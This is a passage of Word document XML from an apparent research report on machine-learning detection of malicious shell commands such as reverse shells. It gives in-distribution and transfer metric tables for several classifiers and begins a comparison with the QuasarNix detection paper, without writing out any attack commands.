              <w:t>0.720</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset1 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.753</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.534</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.662</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset2 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.886</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.819</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.697</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.052</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.753</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.937</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isolation_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset1 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.781</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.860</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.146</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.249</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.812</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isolation_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset1→dataset2 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.760</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.656</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.084</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.148</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.677</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isolation_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset1 (transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.779</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.843</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.241</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.787</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>isolation_forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset2→dataset2 (in-dist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.762</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.731</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.079</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.677</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reading the table (diagnosis seed):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a large diagonal→off-diagonal drop is either </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Environmental Distribution Shift</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (curated Dataset 1 vs real honeypot Dataset 2 — different attack surface form) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Model Overfitting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the training source. The asymmetry (D1→D2 vs D2→D1) tells them apart: if D1→D2 &gt;&gt; D2→D1, the curated set has broader coverage and the honeypot model is narrow (overfit), not just shifted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.3 — Comparison vs. the Trizna ("TOPS") Paper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The assigned TOPS paper is Trizna, D., Demetrio, L., Biggio, B., &amp; Roli, F. (2026), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Robust Large-Scale Detection of Living-Off-the-Land Reverse Shells via Data Synthesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, ACM TOPS, DOI: 10.1145/3807450 (arXiv:2402.18329). This is the QuasarNix paper — its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>quasarnix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> corpus is one of our own attack sources. The comparison below also references Trizna's earlier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>SLP paper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (arXiv:2107.02438, CAMLIS 2021) where relevant. Our own numbers are from [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/summary.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>](../results/summary.json) and the forensics in [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch8_findings.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>](ch8_findings.md).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Error-profile comparison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r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Failure mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Trizna-style model (seq2seq anomaly detector / QuasarNix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Our XGBoost-hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Our 1D-CNN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Overt attacks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (reverse shells, dropper cradles)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Caught reliably.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> QuasarNix's entire design goal is robust detection of reverse shells; a seq2seq model flags them as high-reconstruction-error outliers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Caught reliably</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>quasarnix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0/58 and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
